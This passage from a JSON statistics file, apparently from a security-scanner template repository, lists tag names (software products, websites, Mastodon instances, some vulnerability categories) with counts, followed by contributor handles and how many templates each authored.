name":"bing","count":1},{"name":"racksnet","count":1},{"name":"netic","count":1},{"name":"monday","count":1},{"name":"phpok","count":1},{"name":"mirasys","count":1},{"name":"bigfix","count":1},{"name":"h2c","count":1},{"name":"find","count":1},{"name":"modoboa","count":1},{"name":"line","count":1},{"name":"acontent","count":1},{"name":"openpagerank","count":1},{"name":"maroc-nl","count":1},{"name":"workreap","count":1},{"name":"oscommerce","count":1},{"name":"nport","count":1},{"name":"hugging-face","count":1},{"name":"promodj","count":1},{"name":"ewm","count":1},{"name":"jumpcloud","count":1},{"name":"elmah","count":1},{"name":"lychee","count":1},{"name":"zope","count":1},{"name":"bdsmlr","count":1},{"name":"zenrows","count":1},{"name":"aspera","count":1},{"name":"mastodon-defcon","count":1},{"name":"file-download","count":1},{"name":"flureedb","count":1},{"name":"zendframework","count":1},{"name":"mylittleadmin","count":1},{"name":"pendo","count":1},{"name":"gsoap","count":1},{"name":"acme","count":1},{"name":"gallery","count":1},{"name":"nh","count":1},{"name":"biotime","count":1},{"name":"teltonika","count":1},{"name":"bagisto","count":1},{"name":"tiktok","count":1},{"name":"pghero","count":1},{"name":"omi","count":1},{"name":"atg","count":1},{"name":"projectdiscovery","count":1},{"name":"nedi","count":1},{"name":"woo-order-export-lite","count":1},{"name":"1forge","count":1},{"name":"3dnews","count":1},{"name":"emobile","count":1},{"name":"patch","count":1},{"name":"honeywell","count":1},{"name":"queer","count":1},{"name":"stytch","count":1},{"name":"tup","count":1},{"name":"themefusion","count":1},{"name":"bumsys","count":1},{"name":"orangehrm","count":1},{"name":"h-sphere","count":1},{"name":"member-hero","count":1},{"name":"soundcloud","count":1},{"name":"liberty","count":1},{"name":"libretoothgr-mastodon-instance","count":1},{"name":"udraw","count":1},{"name":"concourse","count":1},{"name":"twpro","count":1},{"name":"xunchi","count":1},{"name":"cypress","count":1},{"name":"bodybuildingcom","count":1},{"name":"trilithic","count":1},{"name":"camunda","count":1},{"name":"mobiproxy","count":1},{"name":"vero","count":1},{"name":"apigee","count":1},{"name":"getmonero","count":1},{"name":"html2wp","count":1},{"name":"joomsport-sports-league-results-management","count":1},{"name":"trino","count":1},{"name":"kwejkpl","count":1},{"name":"v2924","count":1},{"name":"grandprof","count":1},{"name":"mod-jk","count":1},{"name":"discord","count":1},{"name":"statistics","count":1},{"name":"orangeforum","count":1},{"name":"muck-rack","count":1},{"name":"hookbot","count":1},{"name":"hc-custom-wp-admin-url","count":1},{"name":"vcloud","count":1},{"name":"mastodonbooksnet-mastodon-instance","count":1},{"name":"ipstack","count":1},{"name":"emlog","count":1},{"name":"breach-forums","count":1},{"name":"pagekit","count":1},{"name":"pokec","count":1},{"name":"maxsite","count":1},{"name":"xeams","count":1},{"name":"stripchat","count":1},{"name":"jbpm","count":1},{"name":"zenserp","count":1},{"name":"chesscom","count":1},{"name":"demotywatory","count":1},{"name":"tracing","count":1},{"name":"jabber","count":1},{"name":"uservoice","count":1},{"name":"wdja","count":1},{"name":"cvnd2018","count":1},{"name":"extreme","count":1},{"name":"register","count":1},{"name":"sympa","count":1},{"name":"mastodon-climatejusticerocks","count":1},{"name":"extractor","count":1},{"name":"popl","count":1},{"name":"void","count":1},{"name":"yealink","count":1},{"name":"fine-art-america","count":1},{"name":"pettingzooco-mastodon-instance","count":1},{"name":"wmt","count":1},{"name":"casemanager","count":1},{"name":"checkmarx","count":1},{"name":"hubski","count":1},{"name":"playable","count":1},{"name":"slstudio","count":1},{"name":"lanproxy","count":1},{"name":"h2","count":1},{"name":"mining","count":1},{"name":"agilecrm","count":1},{"name":"proxycrawl","count":1},{"name":"default-jwt","count":1},{"name":"setlistfm","count":1},{"name":"wowhead","count":1},{"name":"cooperhewitt","count":1},{"name":"secure-copy-content-protection","count":1},{"name":"saltapi","count":1},{"name":"issuu","count":1},{"name":"myvuehelp","count":1},{"name":"incapptic-connect","count":1},{"name":"toolkit","count":1},{"name":"game-debate","count":1},{"name":"unyson","count":1},{"name":"enterprise","count":1},{"name":"newgrounds","count":1},{"name":"tradingview","count":1},{"name":"wget","count":1},{"name":"geniusocean","count":1},{"name":"apos","count":1},{"name":"jinher","count":1},{"name":"registrationmagic","count":1},{"name":"opensource","count":1},{"name":"pelco","count":1},{"name":"marshmallow","count":1},{"name":"imgsrcru","count":1},{"name":"aveva","count":1},{"name":"climatejusticerocks-mastodon-instance","count":1},{"name":"facturascripts","count":1},{"name":"thegatewaypundit","count":1},{"name":"temporal","count":1},{"name":"mobotix","count":1},{"name":"newspaper","count":1},{"name":"webclient","count":1},{"name":"librenms","count":1},{"name":"adultism","count":1},{"name":"ulubpl","count":1},{"name":"atechmedia","count":1},{"name":"timesheet","count":1},{"name":"logontracer","count":1},{"name":"arcade","count":1},{"name":"auxin-elements","count":1},{"name":"ubiquiti","count":1},{"name":"duolingo","count":1},{"name":"ctflearn","count":1},{"name":"elloco","count":1},{"name":"pornhub-users","count":1},{"name":"pingdom","count":1},{"name":"leanix","count":1},{"name":"xanga","count":1},{"name":"bolt","count":1},{"name":"retool","count":1},{"name":"analytics","count":1},{"name":"gyra","count":1},{"name":"logger1000","count":1},{"name":"alchemy","count":1},{"name":"discusselasticco","count":1},{"name":"codekop","count":1},{"name":"taskrabbit","count":1},{"name":"clockwatch","count":1},{"name":"wpquery","count":1},{"name":"harmony","count":1},{"name":"ioncube","count":1},{"name":"tootingch-mastodon-instance","count":1},{"name":"discusssocial-mastodon-instance","count":1},{"name":"updraftplus","count":1},{"name":"pulsar360","count":1},{"name":"browserless","count":1},{"name":"acemanager","count":1},{"name":"secnet-ac","count":1},{"name":"snipeit","count":1},{"name":"amdoren","count":1},{"name":"anonymous","count":1},{"name":"hanime","count":1},{"name":"inaturalist","count":1},{"name":"vine","count":1},{"name":"dapr","count":1},{"name":"rainloop","count":1},{"name":"nconf","count":1},{"name":"infinitewp","count":1},{"name":"logitech","count":1},{"name":"idera","count":1},{"name":"micro","count":1},{"name":"short.io","count":1},{"name":"verify","count":1},{"name":"bacnet","count":1},{"name":"adWidget","count":1},{"name":"cybrotech","count":1},{"name":"admire-me","count":1},{"name":"easyen","count":1},{"name":"our-freedom-book","count":1},{"name":"locklizard","count":1},{"name":"apiflash","count":1},{"name":"fortiddos","count":1},{"name":"plone","count":1},{"name":"kingdee","count":1},{"name":"kickstarter","count":1},{"name":"sentimente","count":1},{"name":"watershed","count":1},{"name":"meraki","count":1},{"name":"remkon","count":1},{"name":"contentkeeper","count":1},{"name":"cgit","count":1},{"name":"atutor","count":1},{"name":"blueiris","count":1},{"name":"holidayapi","count":1},{"name":"brandfolder","count":1},{"name":"txt","count":1},{"name":"axiom","count":1},{"name":"forumprawneorg","count":1},{"name":"askfm","count":1},{"name":"xvideos-profiles","count":1},{"name":"hackernoon","count":1},{"name":"bhagavadgita","count":1},{"name":"free5gc","count":1},{"name":"apex-legends","count":1},{"name":"sceditor","count":1},{"name":"dropbox","count":1},{"name":"natemail","count":1},{"name":"caringbridge","count":1},{"name":"getgrav","count":1},{"name":"n-central","count":1},{"name":"colourlovers","count":1},{"name":"c99","count":1},{"name":"droners","count":1},{"name":"hdnetwork","count":1},{"name":"openweather","count":1},{"name":"debian","count":1},{"name":"nessus","count":1},{"name":"codoforumrce","count":1},{"name":"rumblechannel","count":1},{"name":"wp-cli","count":1},{"name":"watchmemorecom","count":1},{"name":"acsoft","count":1},{"name":"sma1000","count":1},{"name":"jk","count":1},{"name":"tagged","count":1},{"name":"ubisoft","count":1},{"name":"media","count":1},{"name":"mastodon-polsocial","count":1},{"name":"director","count":1},{"name":"webcomco","count":1},{"name":"weheartit","count":1},{"name":"zatrybipl","count":1},{"name":"maximo","count":1},{"name":"webasyst","count":1},{"name":"forescout","count":1},{"name":"taiga","count":1},{"name":"webctrl","count":1},{"name":"iucn","count":1},{"name":"duplicator","count":1},{"name":"faust","count":1},{"name":"themeforest","count":1},{"name":"formcraft3","count":1},{"name":"details","count":1},{"name":"account-takeover","count":1},{"name":"broker","count":1},{"name":"huemagic","count":1},{"name":"b2bbuilder","count":1},{"name":"woocs","count":1},{"name":"bunpro","count":1},{"name":"wifi","count":1},{"name":"quixplorer","count":1},{"name":"easy-digital-downloads","count":1},{"name":"advance-custom-field","count":1},{"name":"mobile","count":1},{"name":"gumroad","count":1},{"name":"phpnow","count":1},{"name":"arduino","count":1},{"name":"mcname-minecraft","count":1},{"name":"paytm","count":1},{"name":"footprints","count":1},{"name":"osquery","count":1},{"name":"somansa","count":1},{"name":"room-alert","count":1},{"name":"coverity","count":1},{"name":"rustici","count":1},{"name":"suprema","count":1},{"name":"goahead","count":1},{"name":"cloudera","count":1},{"name":"dompdf","count":1},{"name":"shanii-writes","count":1},{"name":"ru-123rf","count":1},{"name":"currencyfreaks","count":1},{"name":"coinlayer","count":1},{"name":"petfinder","count":1},{"name":"quip","count":1},{"name":"documentor-lite","count":1},{"name":"moinmoin","count":1},{"name":"minecraft-list","count":1},{"name":"cashapp","count":1},{"name":"vibilagare","count":1},{"name":"arris","count":1},{"name":"namedprocess","count":1},{"name":"kongregate","count":1},{"name":"kkFileview","count":1},{"name":"jupyterhub","count":1},{"name":"nsq","count":1},{"name":"disabledrocks-mastodon-instance","count":1},{"name":"thinkadmin","count":1},{"name":"apteka","count":1},{"name":"e2pdf","count":1},{"name":"jumpserver","count":1},{"name":"tuxedo","count":1},{"name":"schneider","count":1},{"name":"sage","count":1},{"name":"cameo","count":1},{"name":"docebo","count":1},{"name":"oki","count":1},{"name":"mongoose","count":1},{"name":"browshot","count":1},{"name":"pdf-generator-for-wp","count":1},{"name":"fodors-forum","count":1},{"name":"jalios","count":1},{"name":"rss","count":1},{"name":"cname","count":1},{"name":"nexusphp","count":1},{"name":"dailymotion","count":1},{"name":"labtech","count":1},{"name":"dicoogle","count":1},{"name":"feifeicms","count":1},{"name":"ojs","count":1},{"name":"pcoweb","count":1},{"name":"radius","count":1},{"name":"magabook","count":1},{"name":"sco","count":1},{"name":"ui","count":1},{"name":"easy","count":1},{"name":"21buttons","count":1},{"name":"roads","count":1},{"name":"etsy","count":1},{"name":"solikick","count":1},{"name":"atlantis","count":1},{"name":"mesos","count":1},{"name":"readthedocs","count":1},{"name":"deimosc2","count":1},{"name":"oliver","count":1},{"name":"crevado","count":1},{"name":"roundcube","count":1},{"name":"hiawatha","count":1},{"name":"fleet","count":1},{"name":"screenshot","count":1},{"name":"zaver","count":1},{"name":"airee","count":1},{"name":"cse","count":1},{"name":"msmtp","count":1},{"name":"ticketmaster","count":1},{"name":"download","count":1},{"name":"edms","count":1},{"name":"management","count":1},{"name":"strava","count":1},{"name":"olivetti","count":1},{"name":"sassy","count":1},{"name":"yahoo-japan-auction","count":1},{"name":"etherscan","count":1},{"name":"termtalk","count":1},{"name":"gargoyle","count":1},{"name":"crypto","count":1},{"name":"polywork","count":1},{"name":"scoutwiki","count":1},{"name":"ecom","count":1},{"name":"wp-gdpr-compliance","count":1},{"name":"phonepe","count":1},{"name":"albicla","count":1},{"name":"graphicssocial-mastodon-instance","count":1},{"name":"yaws","count":1},{"name":"boot","count":1},{"name":"zoomitir","count":1},{"name":"sarg","count":1},{"name":"independent-academia","count":1},{"name":"wikidot","count":1},{"name":"mrtg","count":1},{"name":"totaljs","count":1},{"name":"openvz","count":1},{"name":"gamespot","count":1},{"name":"cucm","count":1},{"name":"realteo","count":1},{"name":"pyspider","count":1},{"name":"lfw","count":1},{"name":"nocodb","count":1},{"name":"woody","count":1},{"name":"nc2","count":1},{"name":"csod","count":1},{"name":"maccmsv10","count":1},{"name":"ecshop","count":1},{"name":"hcl","count":1},{"name":"customize-login-image","count":1},{"name":"grails","count":1},{"name":"ddownload","count":1},{"name":"careerhabr","count":1},{"name":"tox","count":1},{"name":"imgur","count":1},{"name":"inetutils","count":1},{"name":"wpb-show-core","count":1},{"name":"finereport","count":1},{"name":"opensearch","count":1},{"name":"jaspersoft","count":1},{"name":"qmail","count":1},{"name":"activecollab","count":1},{"name":"narnoo-distributor","count":1},{"name":"esmtp","count":1},{"name":"bentbox","count":1},{"name":"planon","count":1},{"name":"charity","count":1},{"name":"eibiz","count":1},{"name":"cheezburger","count":1},{"name":"svnserve","count":1},{"name":"uiuxdevsocial-mastodon-instance","count":1},{"name":"xvr","count":1},{"name":"gloriatv","count":1},{"name":"mixlr","count":1},{"name":"avigilon","count":1},{"name":"steam","count":1},{"name":"sureline","count":1},{"name":"clustering","count":1},{"name":"tenor","count":1},{"name":"moneysavingexpert","count":1},{"name":"wanelo","count":1},{"name":"awin","count":1},{"name":"artists-clients","count":1},{"name":"veriz0wn","count":1},{"name":"championat","count":1},{"name":"graphiql","count":1},{"name":"h5sconsole","count":1},{"name":"mylittlebackup","count":1},{"name":"trilium","count":1},{"name":"webftp","count":1},{"name":"wp-stats-manager","count":1},{"name":"linear","count":1},{"name":"dynamic","count":1},{"name":"jeecg-boot","count":1},{"name":"groupib","count":1},{"name":"ifunny","count":1},{"name":"avalanche","count":1},{"name":"wireless","count":1},{"name":"sogo","count":1},{"name":"clearfy-cache","count":1},{"name":"pkp-lib","count":1},{"name":"cdata","count":1},{"name":"idemia","count":1},{"name":"researchgate","count":1},{"name":"xproxy","count":1},{"name":"gmail","count":1},{"name":"istat","count":1},{"name":"ftm","count":1},{"name":"adserver","count":1},{"name":"thedogapi","count":1},{"name":"html2pdf","count":1},{"name":"gira","count":1},{"name":"osint-image","count":1},{"name":"fandom","count":1},{"name":"mastodon-101010pl","count":1},{"name":"imagements","count":1},{"name":"enumeration","count":1},{"name":"luftguitar","count":1},{"name":"openedx","count":1},{"name":"kaggle","count":1},{"name":"ecsimagingpacs","count":1},{"name":"autonomy","count":1},{"name":"js-analyse","count":1},{"name":"alloannonces","count":1},{"name":"acf","count":1},{"name":"engage","count":1},{"name":"bitchute","count":1},{"name":"netvibes","count":1},{"name":"mailwatch","count":1},{"name":"eureka","count":1},{"name":"gilacms","count":1},{"name":"rumbleuser","count":1},{"name":"asgaros-forum","count":1},{"name":"3dtoday","count":1},{"name":"codeforces","count":1},{"name":"coinranking","count":1},{"name":"europeana","count":1},{"name":"opennebula","count":1},{"name":"cowboys4angels","count":1},{"name":"zap","count":1},{"name":"sast","count":1},{"name":"freepbx","count":1},{"name":"gnu","count":1},{"name":"smh","count":1},{"name":"ultimate-faqs","count":1},{"name":"blackduck","count":1},{"name":"apim","count":1},{"name":"mongo-express","count":1},{"name":"iplanet","count":1},{"name":"sling","count":1},{"name":"furaffinity","count":1},{"name":"totalwar","count":1},{"name":"hivemanager","count":1},{"name":"meshcentral","count":1},{"name":"vnc","count":1},{"name":"h5s","count":1},{"name":"livemasterru","count":1},{"name":"social-msdn","count":1},{"name":"admidio","count":1},{"name":"shirnecms","count":1},{"name":"noescape","count":1},{"name":"suitecrm","count":1},{"name":"biolink","count":1},{"name":"supervisor","count":1},{"name":"raspap","count":1},{"name":"easy-student-results","count":1},{"name":"fansly","count":1},{"name":"pronounspage","count":1},{"name":"cd-action","count":1},{"name":"bullwark","count":1},{"name":"speakout","count":1},{"name":"eos","count":1},{"name":"darkstat","count":1},{"name":"fox","count":1},{"name":"backpack","count":1},{"name":"soloby","count":1},{"name":"clickup","count":1},{"name":"zbiornik","count":1},{"name":"flyteconsole","count":1},{"name":"wordpress-support","count":1},{"name":"wp-shoutbox-live-chat","count":1},{"name":"kaes","count":1},{"name":"zoneminder","count":1},{"name":"biostar2","count":1},{"name":"ecosys","count":1},{"name":"carbonmade","count":1},{"name":"genie","count":1},{"name":"agegate","count":1},{"name":"viaware","count":1},{"name":"cloudanalytics","count":1},{"name":"poisoning","count":1},{"name":"etouch","count":1},{"name":"csrfguard","count":1},{"name":"intel","count":1},{"name":"tunefind","count":1},{"name":"domos","count":1},{"name":"mapmytracks","count":1},{"name":"clickhouse","count":1},{"name":"verint","count":1},{"name":"novus","count":1},{"name":"wix","count":1},{"name":"mismatched","count":1},{"name":"sso","count":1},{"name":"apolloadminservice","count":1},{"name":"tf2-backpack-examiner","count":1},{"name":"ab-map","count":1},{"name":"voice123","count":1},{"name":"gunicorn","count":1},{"name":"metaview","count":1},{"name":"quasar","count":1},{"name":"mastodon-chaossocial","count":1},{"name":"o2","count":1},{"name":"pewex","count":1},{"name":"dplus","count":1},{"name":"lacie","count":1},{"name":"orbiteam","count":1},{"name":"awx","count":1},{"name":"global","count":1},{"name":"appweb","count":1},{"name":"gn-publisher","count":1},{"name":"app","count":1},{"name":"curiouscat","count":1},{"name":"weboftrust","count":1},{"name":"mongoshake","count":1},{"name":"jspxcms","count":1},{"name":"kyocera","count":1},{"name":"gift-voucher","count":1},{"name":"ismygirl","count":1},{"name":"pagecdn","count":1},{"name":"mqtt","count":1},{"name":"parler","count":1},{"name":"omniampx","count":1},{"name":"lutron","count":1},{"name":"fastvue","count":1},{"name":"dapp","count":1},{"name":"age-verification","count":1},{"name":"intellect","count":1},{"name":"lightdash","count":1}],"authors":[{"name":"dhiyaneshdk","count":907},{"name":"dwisiswant0","count":797},{"name":"daffainfo","count":664},{"name":"pikpikcu","count":353},{"name":"pdteam","count":280},{"name":"pussycat0x","count":261},{"name":"geeknik","count":221},{"name":"ricardomaia","count":220},{"name":"ritikchaddha","count":218},{"name":"0x_akoko","count":179},{"name":"theamanrawat","count":177},{"name":"princechaddha","count":156},{"name":"gy741","count":145},{"name":"arafatansari","count":119},{"name":"tess","count":109},{"name":"r3y3r53","count":80},{"name":"madrobot","count":65},{"name":"zzeitlin","count":64},{"name":"idealphase","count":63},{"name":"akincibor","count":58},{"name":"for3stco1d","count":55},{"name":"gaurang","count":42},{"name":"philippedelteil","count":41},{"name":"righettod","count":41},{"name":"edoardottt","count":40},{"name":"pdresearch","count":39},{"name":"c-sh0","count":35},{"name":"adam crosser","count":31},{"name":"iamnoooob","count":29},{"name":"rootxharsh","count":28},{"name":"ice3man","count":26},{"name":"hardik-solanki","count":24},{"name":"pwnhxl","count":24},{"name":"organiccrap","count":24},{"name":"johnk3r","count":23},{"name":"techbrunchfr","count":23},{"name":"ffffffff0x","count":22},{"name":"j4vaovo","count":22},{"name":"sullo","count":18},{"name":"cckuailong","count":18},{"name":"ctflearner","count":16},{"name":"parthmalhotra","count":16},{"name":"lu4nx","count":15},{"name":"sheikhrishad","count":15},{"name":"random-robbie","count":15},{"name":"pr3r00t","count":15},{"name":"milo2012","count":14},{"name":"r3dg33k","count":14},{"name":"theabhinavgaur","count":13},{"name":"tenbird","count":13},{"name":"0ri2n","count":13},{"name":"melbadry9","count":13},{"name":"sharath","count":13},{"name":"suman_kar","count":12},{"name":"wdahlenb","count":11},{"name":"elsfa7110","count":11},{"name":"cyllective","count":11},{"name":"dogasantos","count":11},{"name":"co5mos","count":10},{"name":"0xpugazh","count":10},{"name":"meme-lord","count":10},{"name":"random_robbie","count":10},{"name":"hackergautam","count":10},{"name":"nadino","count":10},{"name":"alph4byt3","count":10},{"name":"logicalhunter","count":10},{"name":"fabaff","count":9},{"name":"nullfuzz","count":9},{"name":"oppsec","count":9},{"name":"harsh","count":9},{"name":"0x240x23elu","count":9},{"name":"emadshanab","count":9},{"name":"olearycrew","count":8},{"name":"zh","count":8},{"name":"iamthefrogy","count":8},{"name":"_0xf4n9x_","count":8},{"name":"veshraj","count":8},{"name":"that_juan_","count":8},{"name":"aashiq","count":8},{"name":"leovalcante","count":7},{"name":"caspergn","count":7},{"name":"techryptic (@tech)","count":7},{"name":"dr_set","count":7},{"name":"its0x08","count":7},{"name":"amit-jd","count":7},{"name":"adamcrosser","count":7},{"name":"me_dheeraj (https://twitter.com/dheerajmadhukar)","count":7},{"name":"harshbothra_","count":7},{"name":"randomstr1ng","count":7},{"name":"divya_mudgal","count":7},{"name":"kophjager007","count":7},{"name":"xelkomy","count":6},{"name":"praetorian-thendrickson","count":6},{"name":"noraj","count":6},{"name":"pathtaga","count":6},{"name":"puzzlepeaches","count":6},{"name":"ja1sh","count":6},{"name":"evan rubinstein","count":6},{"name":"gitlab red team","count":6},{"name":"justaacat","count":6},{"name":"devang-solanki","count":6},{"name":"pentest_swissky","count":6},{"name":"imnightmaree","count":6},{"name":"clem9669","count":6},{"name":"__fazal","count":6},{"name":"forgedhallpass","count":6},{"name":"nodauf","count":6},{"name":"panch0r3d","count":5},{"name":"irshad ahamed","count":5},{"name":"mr-xn","count":5},{"name":"kh4sh3i","count":5},{"name":"robotshell","count":5},{"name":"yanyun","count":5},{"name":"vicrack","count":5},{"name":"prajiteshsingh","count":5},{"name":"s0obi","count":5},{"name":"r12w4n","count":5},{"name":"defr0ggy","count":5},{"name":"joanbono","count":5},{"name":"ganofins","count":5},{"name":"podalirius","count":5},{"name":"bhutch","count":4},{"name":"r3naissance","count":4},{"name":"wisnupramoedya","count":4},{"name":"dadevel","count":4},{"name":"3th1c_yuk1","count":4},{"name":"scent2d","count":4},{"name":"incogbyte","count":4},{"name":"mastercho","count":4},{"name":"dolev farhi","count":4},{"name":"kazet","count":4},{"name":"powerexploit","count":4},{"name":"tanq16","count":4},{"name":"h1ei1","count":4},{"name":"e_schultze_","count":4},{"name":"shine","count":4},{"name":"binaryfigments","count":3},{"name":"whoever","count":3},{"name":"unstabl3","count":3},{"name":"davidmckennirey","count":3},{"name":"lark-lab","count":3},{"name":"shifacyclewala","count":3},{"name":"impramodsargar","count":3},{"name":"atomiczsec","count":3},{"name":"matt galligan","count":3},{"name":"0w4ys","count":3},{"name":"andydoering","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"fxploit","count":3},{"name":"mavericknerd","count":3},{"name":"vagnerd","count":3},{"name":"vsh00t","count":3},{"name":"johnjhacking","count":3},{"name":"thomas_from_offensity","count":3},{"name":"dudez","count":3},{"name":"canberbamber","count":3},{"name":"f1tz","count":3},{"name":"me9187","count":3},{"name":"z3bd","count":3},{"name":"hahwul","count":3},{"name":"true13","count":3},{"name":"sushantkamble","count":3},{"name":"ambassify","count":3},{"name":"arm!tage","count":3},{"name":"_generic_human_","count":3},{"name":"evergreencartoons","count":3},{"name":"ekrause","count":3},{"name":"splint3r7","count":3},{"name":"bernardofsr","count":3},{"name":"cheesymoon","count":3},{"name":"skeltavik","count":3},{"name":"emenalf","count":3},{"name":"ph33r","count":3},{"name":"jarijaas","count":3},{"name":"arcc","count":3},{"name":"badboycxcc","count":3},{"name":"lucasljm2001","count":3},{"name":"alifathi-h1","count":3},{"name":"k0pak4","count":3},{"name":"yuzhe-zhang-0","count":3},{"name":"fyoorer","count":3},{"name":"huowuzhao","count":3},{"name":"taielab","count":3},{"name":"swissky","count":3},{"name":"dr0pd34d","count":3},{"name":"dogancanbakir","count":2},{"name":"kiblyn11","count":2},{"name":"hetroublemakr","count":2},{"name":"joshlarsen","count":2},{"name":"nvn1729","count":2},{"name":"supras","count":2},{"name":"raesene","count":2},{"name":"bp0lr","count":2},{"name":"manas_harsh","count":2},{"name":"dheerajmadhukar","count":2},{"name":"mohammedsaneem","count":2},{"name":"smaranchand","count":2},{"name":"ggranjus","count":2},{"name":"nkxxkn","count":2},{"name":"w4cky_","count":2},{"name":"thezakman","count":2},{"name":"korteke","count":2},{"name":"foulenzer","count":2},{"name":"socketz","count":2},{"name":"myztique","count":2},{"name":"notnotnotveg","count":2},{"name":"moritz nentwig","count":2},{"name":"streetofhackerr007","count":2},{"name":"bsysop","count":2},{"name":"0xsmiley","count":2},{"name":"wa1tf0rme","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"github.com/its0x08","count":2},{"name":"lum8rjack","count":2},{"name":"ajaysenr","count":2},{"name":"israel comazzetto dos reis","count":2},{"name":"pxmme1337","count":2},{"name":"sbani","count":2},{"name":"kishore-hariram","count":2},{"name":"ree4pwn","count":2},{"name":"codexlynx","count":2},{"name":"bananabr","count":2},{"name":"convisoappsec","count":2},{"name":"ricardo maia (brainfork)","count":2},{"name":"udit_thakkur","count":2},{"name":"shelled","count":2},{"name":"666asd","count":2},{"name":"redteambrasil","count":2},{"name":"cckuakilong","count":2},{"name":"randomrobbie","count":2},{"name":"joshua rogers","count":2},{"name":"z0ne","count":2},{"name":"parth","count":2},{"name":"gal nagli","count":2},{"name":"lotusdll","count":2},{"name":"0xnirvana","count":2},{"name":"coldfish","count":2},{"name":"nybble04","count":2},{"name":"0xprial","count":2},{"name":"d4vy","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"0xsapra","count":2},{"name":"0xrudra","count":2},{"name":"gevakun","count":2},{"name":"dahse89","count":2},{"name":"bing0o","count":2},{"name":"c3l3si4n","count":2},{"name":"0xelkomy","count":2},{"name":"sinkettu","count":2},{"name":"cocxanh","count":2},{"name":"nuk3s3c","count":2},{"name":"zomsop82","count":2},{"name":"uomogrande","count":2},{"name":"paradessia","count":2},{"name":"afaq","count":2},{"name":"thardt-praetorian","count":2},{"name":"k11h-de","count":2},{"name":"sy3omda","count":2},{"name":"danielmofer","count":2},{"name":"gtrrnr","count":2},{"name":"luci","count":2},{"name":"clarkvoss","count":2},{"name":"brenocss","count":2},{"name":"g4l1t0","count":2},{"name":"rafaelwdornelas","count":2},{"name":"m4lwhere","count":2},{"name":"koti2","count":2},{"name":"hackerarpan","count":2},{"name":"maximus decimus","count":2},{"name":"v0idc0de","count":2},{"name":"vavkamil","count":2},{"name":"geekby","count":2},{"name":"n-thumann","count":2},{"name":"8arthur","count":2},{"name":"dbrwsky","count":2},{"name":"brucelsone","count":2},{"name":"paperpen","count":2},{"name":"kre80r","count":2},{"name":"megamansec","count":2},{"name":"sascha brendel","count":2},{"name":"heeress","count":2},{"name":"ehsahil","count":2},{"name":"0xcrypto","count":2},{"name":"martincodes-de","count":2},{"name":"x1m_martijn","count":2},{"name":"amsda","count":2},{"name":"randomdhiraj","count":2},{"name":"j3ssie","count":2},{"name":"joeldeleep","count":2},{"name":"y4er","count":2},{"name":"yashanand155","count":1},{"name":"kareemse1im","count":1},{"name":"kabirsuda","count":1},{"name":"ayadi","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"pussycat0","count":1},{"name":"gboddin","count":1},{"name":"ohlinge","count":1},{"name":"bughuntersurya","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"aron molnar","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"soyelmago","count":1},{"name":"noobexploiter","count":1},{"name":"0xd0ff9","count":1},{"name":"ptonewreckin","count":1},{"name":"manasmbellani","count":1},{"name":"aravind","count":1},{"name":"intx0x80","count":1},{"name":"x6263","count":1},{"name":"husain","count":1},{"name":"ola456","count":1},{"name":"regala_","count":1},{"name":"dievus","count":1},{"name":"elitebaz","count":1},{"name":"kiransau","count":1},{"name":"anon-artist","count":1},{"name":"zandros0","count":1},{"name":"osamahamad","count":1},{"name":"lingtren","count":1},{"name":"zy9ard3","count":1},{"name":"mass0ma","count":1},{"name":"d0rkerdevil","count":1},{"name":"mbmy","count":1},{"name":"furkansenan","count":1},{"name":"ldionmarcil","count":1},{"name":"tehtbl","count":1},{"name":"daviey","count":1},{"name":"affix","count":1},{"name":"therealtoastycat","count":1},{"name":"co0nan","count":1},{"name":"ofjaaah","count":1},{"name":"mrharshvardhan","count":1},{"name":"naglis","count":1},{"name":"p-l-","count":1},{"name":"kailashbohara","count":1},{"name":"rojanrijal","count":1},{"name":"charanrayudu","count":1},{"name":"becivells","count":1},{"name":"carlosvieira","count":1},{"name":"0xelkomy \u0026 c0nqr0r","count":1},{"name":"rschio","count":1},{"name":"udinchan","count":1},{"name":"jas37","count":1},{"name":"ramondunker","count":1},{"name":"push4d","count":1},{"name":"florianmaak","count":1},{"name":"shifacyclewla","count":1},{"name":"fopina","count":1},{"name":"0xteles","count":1},{"name":"kagamigawa","count":1},{"name":"hanlaomo","count":1},{"name":"am0nt31r0","count":1},{"name":"udyz","count":1},{"name":"shockwave","count":1},{"name":"marcio mendes","count":1},{"name":"kaizensecurity","count":1},{"name":"sak1","count":1},{"name":"davidfegyver","count":1},{"name":"ayadim","count":1},{"name":"bywalks","count":1},{"name":"bjhulst","count":1},{"name":"oscarintherocks","count":1},{"name":"b0rn2r00t","count":1},{"name":"nielsing","count":1},{"name":"pdp","count":1},{"name":"bugvsme","count":1},{"name":"omarjezi","count":1},{"name":"0xtavian","count":1},{"name":"alexrydzak","count":1},{"name":"philippdelteil","count":1},{"name":"narluin","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"phyr3wall","count":1},{"name":"sinsinology","count":1},{"name":"supr4s","count":1},{"name":"noamrathaus","count":1},{"name":"arjunchandarana","count":1},{"name":"notsoevilweasel","count":1},{"name":"jbertman","count":1},{"name":"shiar","count":1},{"name":"chesterblue","count":1},{"name":"hexcat","count":1},{"name":"opencirt","count":1},{"name":"shreyapohekar","count":1},{"name":"unkl4b","count":1},{"name":"0h1in9e","count":1},{"name":"_harleo","count":1},{"name":"piyushchhiroliya","count":1},{"name":"0xceba","count":1},{"name":"keni0k","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"dale clarke","count":1},{"name":"couskito","count":1},{"name":"aaronchen0","count":1},{"name":"booboohq","count":1},{"name":"jna1","count":1},{"name":"team syslifters / christoph mahrl","count":1},{"name":"1nf1n7y","count":1},{"name":"fq_hsu","count":1},{"name":"failopen","count":1},{"name":"infosecsanyam","count":1},{"name":"dawid-czarnecki","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"mesaglio","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"marcos_iaf","count":1},{"name":"lrtk-coder","count":1},{"name":"0xh7ml","count":1},{"name":"ahmed sherif","count":1},{"name":"rubina119","count":1},{"name":"mr. bobo 